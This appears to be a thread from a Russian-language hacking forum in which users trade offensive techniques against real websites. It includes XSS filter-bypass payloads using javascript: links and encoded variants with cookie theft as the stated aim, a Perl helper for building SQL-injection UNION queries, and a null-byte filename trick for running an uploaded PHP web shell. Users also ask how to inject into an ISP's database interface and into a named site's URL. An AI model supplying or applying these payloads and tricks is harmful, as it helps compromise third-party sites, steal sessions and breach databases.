вопрос специалистам. При проведении XSS при вводе код Code: alert(99) заменяется на Code: alert&*#40;99&*#41; (без звездочек) Возможно ли обойти это и провести XSS? Можно ли заменить круглые скобки чем-то еще?
При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?
давно какт о тоже нопесал Code: #!/usr/bin/perl while (1) { print "\n\nNumber of columns\n"; $id = <STDIN>; chomp ($id); $x = 1; print "-1+union+select+"; while ($x < $id) { print "$x,"; $x++; } if ($x = $id) { print "$x/*"; } }
Нет, необязателен алерт Но, например, Code: var i=new Image(); ... уже не прокатит. Да и уязвимость в тэге a - есть желание запихать ксс в style, где юзается url() - также со скобками
1)принудительно закрыть тег <a> и прописать <script>...</script> 2) Code: <a href="javascript:alert('XSS')">click</a> Code: =decoded= <a href="javascript:alert('XSS')"></a>
Вот ещё несколько вариантов Code: <a href="j\;a\;v\;a\;s\;c\;r\;i\;p\;t\;:\;a\;l\;e\;r\;t\;(\;'\;X\;S\;S\;'\;)\;">click</a> <a href="javascript:alert('XSS')">click</a> <a href="javascript:alert('XSS')">click</a> <a href="javascript:alert(xss)">click</a> <a href="javascript:alert(\;xss)\;">click</a> <A HREF="http://66.102.7.147/">click</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="h tt p://6 6.000146.0x7.147/">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> все "\;" заменить на ;
Сенкс за наводку, попробую, но сразу скажу, там обрабатываются таким же образом и амперсанд, и кавычка, и апостроф (обратный апостроф не фильтруется)
Я загрузил на сервер шелл с именем img.php.gif но сервер загрузил как img.php.1201468364.gif каким образом мне запустить шелл?
Попробуй загрузить кратинку с именем img.php%00.gif Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php
Привет.У меня есть вопрос... мой провайдер (raid.ru) использует какуюто особую программ для работы пользователя с бд Programm ppo.c version 1.7 смог выжать конфиг в котором как понял прописаны все бд /var/www/db.raid.ru/cgi-bin/ora_agent.cfg запросы формируются странным образом https://db.raid.ru/cgi-bin/ppo/es_webface/point_access.services es_webface название бд как я понял point_access -хз services -действие если кто что знает подскажите...
что есть: Programm ppo.c version 1.7 каким образом формируются запросы есть ли вариеции инжэкта через этот скрипт
Возможно раскрутить такую скуль,и если да то как? Заранее спасибо. код: http://www.yerevan.ru/news/print.php?id=999+order+by+1/*